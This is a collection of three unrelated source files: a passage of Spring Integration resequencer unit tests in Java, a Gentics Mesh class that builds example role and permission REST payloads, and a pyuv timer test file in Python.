	Message<?> reply3 = replyChannel.receive(0);
	// only messages 1 and 2 should have been received by now
	assertThat(reply1).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1);
	assertThat(reply2).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2);
	assertThat(reply3).isNull();
	// when sending the last message, the whole sequence must have been sent
	this.resequencer.handleMessage(message4);
	reply3 = replyChannel.receive(0);
	Message<?> reply4 = replyChannel.receive(0);
	assertThat(reply3).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3);
	assertThat(reply4).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply4).getSequenceNumber()).isEqualTo(4);
}

// SimpleMessageStore(3, 2) limits a single group to 2 messages; the third
// message for group 'ABC' must be rejected with a capacity error.
@Test
public void testResequencingWithCapacity() {
	this.resequencer.setReleaseStrategy(new SequenceSizeReleaseStrategy(true));
	// INT-3846
	this.resequencer.setMessageStore(new SimpleMessageStore(3, 2));
	QueueChannel replyChannel = new QueueChannel();
	Message<?> message1 = createMessage("123", "ABC", 4, 4, replyChannel);
	Message<?> message2 = createMessage("456", "ABC", 4, 2, replyChannel);
	Message<?> message3 = createMessage("789", "ABC", 4, 1, replyChannel);
	this.resequencer.handleMessage(message1);
	this.resequencer.handleMessage(message2);
	try {
		this.resequencer.handleMessage(message3);
		fail("Expected exception");
	}
	catch (MessagingException e) {
		assertThat(e.getMessage()).contains("out of capacity (2) for group 'ABC'");
	}
}

// Same partial-release scenario as above but without a size-capped store:
// 1 and 2 are released as soon as they are contiguous, 3 and 4 on completion.
@Test
public void testResequencingWithPartialSequenceAndComparator() {
	this.resequencer.setReleaseStrategy(new SequenceSizeReleaseStrategy(true));
	QueueChannel replyChannel = new QueueChannel();
	Message<?> message1 = createMessage("456", "ABC", 4, 2, replyChannel);
	Message<?> message2 = createMessage("123", "ABC", 4, 1, replyChannel);
	Message<?> message3 = createMessage("XYZ", "ABC", 4, 4, replyChannel);
	Message<?> message4 = createMessage("789", "ABC", 4, 3, replyChannel);
	this.resequencer.handleMessage(message1);
	this.resequencer.handleMessage(message2);
	this.resequencer.handleMessage(message3);
	Message<?> reply1 = replyChannel.receive(0);
	Message<?> reply2 = replyChannel.receive(0);
	Message<?> reply3 = replyChannel.receive(0);
	// only messages 1 and 2 should have been received by now
	assertThat(reply1).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1);
	assertThat(reply2).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2);
	assertThat(reply3).isNull();
	// when sending the last message, the whole sequence must have been sent
	this.resequencer.handleMessage(message4);
	reply3 = replyChannel.receive(0);
	Message<?> reply4 = replyChannel.receive(0);
	assertThat(reply3).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3);
	assertThat(reply4).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply4).getSequenceNumber()).isEqualTo(4);
}

// When a group is force-expired with sendPartialResultOnExpiry=false, its
// buffered messages go to the discard channel; a late arrival for the expired
// group is discarded immediately as well.
@Test
public void testResequencingWithDiscard() {
	QueueChannel discardChannel = new QueueChannel();
	Message<?> message1 = createMessage("123", "ABC", 4, 2, null);
	Message<?> message2 = createMessage("456", "ABC", 4, 1, null);
	Message<?> message3 = createMessage("789", "ABC", 4, 4, null);
	this.resequencer.setSendPartialResultOnExpiry(false);
	this.resequencer.setDiscardChannel(discardChannel);
	this.resequencer.handleMessage(message1);
	this.resequencer.handleMessage(message2);
	// negative timeout expires the group unconditionally; exactly one group exists
	assertThat(store.expireMessageGroups(-10000)).isEqualTo(1);
	Message<?> reply1 = discardChannel.receive(0);
	Message<?> reply2 = discardChannel.receive(0);
	Message<?> reply3 = discardChannel.receive(0);
	// only messages 1 and 2 should have been received by now
	assertThat(reply1).isNotNull();
	assertThat(reply2).isNotNull();
	assertThat(reply3).isNull();
	// discard order is not guaranteed, so compare the sorted sequence numbers
	ArrayList<Integer> sequence = new ArrayList<>(
			Arrays.asList(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber(),
					new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()));
	Collections.sort(sequence);
	assertThat(sequence.toString()).isEqualTo("[1, 2]");
	// Once a group is expired, late messages are discarded immediately by default
	this.resequencer.handleMessage(message3);
	reply3 = discardChannel.receive(0);
	assertThat(reply3).isNotNull();
}

// A message whose sequence-size header conflicts with the group's is rejected:
// only the first (sequence number 1) shows up on the discard channel after
// expiry handling; the conflicting one produces nothing.
@Test
public void testResequencingWithDifferentSequenceSizes() {
	QueueChannel discardChannel = new QueueChannel();
	Message<?> message1 = createMessage("123", "ABC", 4, 2, null);
	Message<?> message2 = createMessage("456", "ABC", 5, 1, null);
	this.resequencer.setSendPartialResultOnExpiry(false);
	this.resequencer.setDiscardChannel(discardChannel);
	this.resequencer.setReleasePartialSequences(true); // force SequenceSizeReleaseStrategy
	this.resequencer.handleMessage(message1);
	this.resequencer.handleMessage(message2);
	// this.resequencer.discardBarrier(this.resequencer.barriers.get("ABC"));
	Message<?> discard1 = discardChannel.receive(0);
	Message<?> discard2 = discardChannel.receive(0);
	// message2 has been discarded because it came in with the wrong sequence size
	assertThat(discard1).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(discard1).getSequenceNumber()).isEqualTo(1);
	assertThat(discard2).isNull();
}

// A sequence number (4) larger than the declared sequence size (2) is invalid;
// the message is rejected outright and never reaches the discard channel.
@Test
public void testResequencingWithWrongSequenceSizeAndNumber() {
	QueueChannel discardChannel = new QueueChannel();
	Message<?> message1 = createMessage("123", "ABC", 2, 4, null);
	this.resequencer.setSendPartialResultOnExpiry(false);
	this.resequencer.setDiscardChannel(discardChannel);
	this.resequencer.handleMessage(message1);
	// this.resequencer.discardBarrier(this.resequencer.barriers.get("ABC"));
	Message<?> reply1 = discardChannel.receive(0);
	// No message has been received - the message has been rejected.
	assertThat(reply1).isNull();
}

// Default (complete-sequence) release: nothing is emitted until the final
// message of the sequence arrives, then all four come out in order.
@Test
public void testResequencingWithCompleteSequenceRelease() {
	QueueChannel replyChannel = new QueueChannel();
	Message<?> message1 = createMessage("123", "ABC", 4, 2, replyChannel);
	Message<?> message2 = createMessage("456", "ABC", 4, 1, replyChannel);
	Message<?> message3 = createMessage("789", "ABC", 4, 4, replyChannel);
	Message<?> message4 = createMessage("XYZ", "ABC", 4, 3, replyChannel);
	this.resequencer.handleMessage(message1);
	this.resequencer.handleMessage(message2);
	this.resequencer.handleMessage(message3);
	Message<?> reply1 = replyChannel.receive(0);
	Message<?> reply2 = replyChannel.receive(0);
	Message<?> reply3 = replyChannel.receive(0);
	// no messages should have been received yet
	assertThat(reply1).isNull();
	assertThat(reply2).isNull();
	assertThat(reply3).isNull();
	// after sending the last message, the whole sequence should have been sent
	this.resequencer.handleMessage(message4);
	reply1 = replyChannel.receive(0);
	reply2 = replyChannel.receive(0);
	reply3 = replyChannel.receive(0);
	Message<?> reply4 = replyChannel.receive(0);
	assertThat(reply1).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1);
	assertThat(reply2).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2);
	assertThat(reply3).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3);
	assertThat(reply4).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply4).getSequenceNumber()).isEqualTo(4);
}

// A one-message sequence completes immediately and its group is removed from
// the message store (size drops back to 0).
@Test
public void testRemovalOfBarrierWhenLastMessageOfSequenceArrives() {
	QueueChannel replyChannel = new QueueChannel();
	String correlationId = "ABC";
	Message<?> message1 = createMessage("123", correlationId, 1, 1, replyChannel);
	resequencer.handleMessage(message1);
	assertThat(store.getMessageGroup(correlationId).size()).isEqualTo(0);
}

// With a 100ms group timeout and default expiry behavior, an incomplete group
// (2 of 3) is discarded on timeout; a later arrival for the group is discarded
// immediately as well.
@Test
public void testTimeoutDefaultExpiry() {
	this.resequencer.setGroupTimeoutExpression(new SpelExpressionParser().parseExpression("100"));
	ThreadPoolTaskScheduler taskScheduler = new ThreadPoolTaskScheduler();
	taskScheduler.afterPropertiesSet();
	this.resequencer.setTaskScheduler(taskScheduler);
	QueueChannel discardChannel = new QueueChannel();
	this.resequencer.setDiscardChannel(discardChannel);
	QueueChannel replyChannel = new QueueChannel();
	this.resequencer.setOutputChannel(replyChannel);
	Message<?> message3 = createMessage("789", "ABC", 3, 3, null);
	Message<?> message2 = createMessage("456", "ABC", 3, 2, null);
	this.resequencer.handleMessage(message3);
	this.resequencer.handleMessage(message2);
	Message<?> out1 = replyChannel.receive(10);
	assertThat(out1).isNull();
	// generous receive timeout so the scheduled expiry can fire on slow machines
	out1 = discardChannel.receive(20000);
	assertThat(out1).isNotNull();
	Message<?> out2 = discardChannel.receive(10);
	assertThat(out2).isNotNull();
	Message<?> message1 = createMessage("123", "ABC", 3, 1, null);
	this.resequencer.handleMessage(message1);
	Message<?> out3 = discardChannel.receive(0);
	assertThat(out3).isNotNull();
}

// Same timeout scenario with expireGroupsUponTimeout=true: after the timeout
// discards 2 of 3, the late first message starts a fresh (again incomplete)
// group that is only discarded by its own later timeout.
@Test
public void testTimeoutDontExpire() {
	this.resequencer.setGroupTimeoutExpression(new SpelExpressionParser().parseExpression("100"));
	ThreadPoolTaskScheduler taskScheduler = new ThreadPoolTaskScheduler();
	taskScheduler.afterPropertiesSet();
	this.resequencer.setTaskScheduler(taskScheduler);
	QueueChannel discardChannel = new QueueChannel();
	this.resequencer.setDiscardChannel(discardChannel);
	QueueChannel replyChannel = new QueueChannel();
	this.resequencer.setOutputChannel(replyChannel);
	this.resequencer.setExpireGroupsUponTimeout(true);
	Message<?> message3 = createMessage("789", "ABC", 3, 3, null);
	Message<?> message2 = createMessage("456", "ABC", 3, 2, null);
	this.resequencer.handleMessage(message3);
	this.resequencer.handleMessage(message2);
	Message<?> out1 = replyChannel.receive(0);
	assertThat(out1).isNull();
	out1 = discardChannel.receive(20_000);
	assertThat(out1).isNotNull();
	Message<?> out2 = discardChannel.receive(10_000);
	assertThat(out2).isNotNull();
	Message<?> message1 = createMessage("123", "ABC", 3, 1, null);
	this.resequencer.handleMessage(message1);
	Message<?> out3 = discardChannel.receive(0);
	// not discarded immediately: the group was fully expired, so a new one forms
	assertThat(out3).isNull();
	out3 = discardChannel.receive(10_000);
	assertThat(out3).isNotNull();
}

/**
 * Build a test message with the correlation/sequence headers the resequencer
 * keys on; {@code replyChannel} may be {@code null} when the test routes
 * output or discards through explicitly configured channels.
 */
private static Message<?> createMessage(String payload, Object correlationId, int sequenceSize,
		int sequenceNumber, MessageChannel replyChannel) {
	return MessageBuilder.withPayload(payload)
			.setCorrelationId(correlationId)
			.setSequenceSize(sequenceSize)
			.setSequenceNumber(sequenceNumber)
			.setReplyChannel(replyChannel)
			.build();
}

}
6,029
563
package com.gentics.mesh.example;

import static com.gentics.mesh.core.rest.common.Permission.CREATE;
import static com.gentics.mesh.core.rest.common.Permission.DELETE;
import static com.gentics.mesh.core.rest.common.Permission.PUBLISH;
import static com.gentics.mesh.core.rest.common.Permission.READ;
import static com.gentics.mesh.core.rest.common.Permission.READ_PUBLISHED;
import static com.gentics.mesh.core.rest.common.Permission.UPDATE;
import static com.gentics.mesh.example.ExampleUuids.GROUP_CLIENT_UUID;
import static com.gentics.mesh.example.ExampleUuids.GROUP_EDITORS_UUID;
import static com.gentics.mesh.example.ExampleUuids.ROLE_ADMIN_UUID;
import static com.gentics.mesh.example.ExampleUuids.ROLE_CLIENT_UUID;

import java.util.ArrayList;
import java.util.List;

import com.gentics.mesh.core.rest.group.GroupReference;
import com.gentics.mesh.core.rest.role.RoleCreateRequest;
import com.gentics.mesh.core.rest.role.RoleListResponse;
import com.gentics.mesh.core.rest.role.RolePermissionRequest;
import com.gentics.mesh.core.rest.role.RolePermissionResponse;
import com.gentics.mesh.core.rest.role.RoleResponse;
import com.gentics.mesh.core.rest.role.RoleUpdateRequest;

/**
 * Provides example payloads for the role REST endpoints (responses, permission
 * requests/responses, list, create and update requests).
 */
public class RoleExamples extends AbstractExamples {

	/**
	 * Build an example role response using the client role UUID.
	 *
	 * @param name role name to set on the example
	 * @return populated example response
	 */
	public RoleResponse getRoleResponse1(String name) {
		RoleResponse roleResponse = new RoleResponse();
		roleResponse.setUuid(ROLE_CLIENT_UUID);
		roleResponse.setName(name);
		roleResponse.setPermissions(READ, UPDATE, DELETE, CREATE);
		roleResponse.setCreated(createOldTimestamp());
		roleResponse.setCreator(createUserReference());
		roleResponse.setEdited(createNewTimestamp());
		roleResponse.setEditor(createUserReference());
		return roleResponse;
	}

	/**
	 * Build an example permission request granting CRUD but neither of the
	 * publish-related permissions, non-recursively.
	 *
	 * @return populated example request
	 */
	public RolePermissionRequest getRolePermissionRequest() {
		RolePermissionRequest permissionRequest = new RolePermissionRequest();
		permissionRequest.getPermissions().set(CREATE, true);
		permissionRequest.getPermissions().set(READ, true);
		permissionRequest.getPermissions().set(UPDATE, true);
		permissionRequest.getPermissions().set(DELETE, true);
		permissionRequest.getPermissions().set(READ_PUBLISHED, false);
		permissionRequest.getPermissions().set(PUBLISH, false);
		permissionRequest.setRecursive(false);
		return permissionRequest;
	}

	/**
	 * Build an example permission response mirroring {@link #getRolePermissionRequest()}:
	 * CRUD granted, publish-related permissions denied.
	 *
	 * @return populated example response
	 */
	public RolePermissionResponse getRolePermissionResponse() {
		RolePermissionResponse permissionResponse = new RolePermissionResponse();
		permissionResponse.set(CREATE, true);
		permissionResponse.set(READ, true);
		permissionResponse.set(UPDATE, true);
		permissionResponse.set(DELETE, true);
		permissionResponse.set(READ_PUBLISHED, false);
		permissionResponse.set(PUBLISH, false);
		return permissionResponse;
	}

	/**
	 * Build an example admin role response including group references for the
	 * editors and clients groups.
	 *
	 * @return populated example response
	 */
	public RoleResponse getRoleResponse2() {
		RoleResponse adminRole = new RoleResponse();
		adminRole.setUuid(ROLE_ADMIN_UUID);
		adminRole.setName("Admin role");
		adminRole.setPermissions(READ, UPDATE, DELETE, CREATE);
		adminRole.setCreated(createOldTimestamp());
		adminRole.setCreator(createUserReference());
		adminRole.setEdited(createNewTimestamp());
		adminRole.setEditor(createUserReference());
		List<GroupReference> groupReferences = new ArrayList<>();
		groupReferences.add(new GroupReference().setName("editors").setUuid(GROUP_EDITORS_UUID));
		groupReferences.add(new GroupReference().setName("clients").setUuid(GROUP_CLIENT_UUID));
		adminRole.setGroups(groupReferences);
		return adminRole;
	}

	/**
	 * Build an example role list containing the reader and admin example roles
	 * with paging metadata applied.
	 *
	 * @return populated example list response
	 */
	public RoleListResponse getRoleListResponse() {
		RoleListResponse roleList = new RoleListResponse();
		roleList.getData().add(getRoleResponse1("Reader role"));
		roleList.getData().add(getRoleResponse2());
		setPaging(roleList, 1, 10, 2, 20);
		return roleList;
	}

	/**
	 * Build an example role update request.
	 *
	 * @param name new role name
	 * @return populated example request
	 */
	public RoleUpdateRequest getRoleUpdateRequest(String name) {
		RoleUpdateRequest updateRequest = new RoleUpdateRequest();
		updateRequest.setName(name);
		return updateRequest;
	}

	/**
	 * Build an example role create request.
	 *
	 * @param name name of the role to create
	 * @return populated example request
	 */
	public RoleCreateRequest getRoleCreateRequest(String name) {
		RoleCreateRequest createRequest = new RoleCreateRequest();
		createRequest.setName(name);
		return createRequest;
	}
}
1,230
826
<reponame>farisachugthai/pyuv<filename>tests/test_timer.py import unittest import warnings from common import TestCase import pyuv class TimerTest(TestCase): def test_timer1(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() timer = pyuv.Timer(self.loop) timer.start(timer_cb, 0.1, 0) self.loop.run() self.assertEqual(self.timer_cb_called, 1) def test_timer_never(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() timer = pyuv.Timer(self.loop) timer.start(timer_cb, 0.1, 0) timer.close() self.loop.run() self.assertEqual(self.timer_cb_called, 0) def test_timer_ref1(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() self.timer = pyuv.Timer(self.loop) self.loop.run() self.assertEqual(self.timer_cb_called, 0) def test_timer_ref2(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() self.timer = pyuv.Timer(self.loop) self.timer.start(timer_cb, 0.1, 0) self.timer.ref = False self.loop.run() self.assertEqual(self.timer_cb_called, 0) self.timer.ref = True self.loop.run() self.assertEqual(self.timer_cb_called, 1) def test_timer_noref(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.close() t = pyuv.Timer(self.loop) t.start(timer_cb, 0.1, 0) t = None self.loop.run() self.assertEqual(self.timer_cb_called, 1) def test_timer_submillisecond(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.close() t = pyuv.Timer(self.loop) with warnings.catch_warnings(record=True) as w: # Cause all warnings to always be triggered warnings.simplefilter('always') t.start(timer_cb, 0.00001, 0) self.assertEqual(len(w), 1) self.assertTrue(issubclass(w[0].category, RuntimeWarning)) self.loop.run() self.assertEqual(self.timer_cb_called, 1) if __name__ == '__main__': unittest.main(verbosity=2)
1,314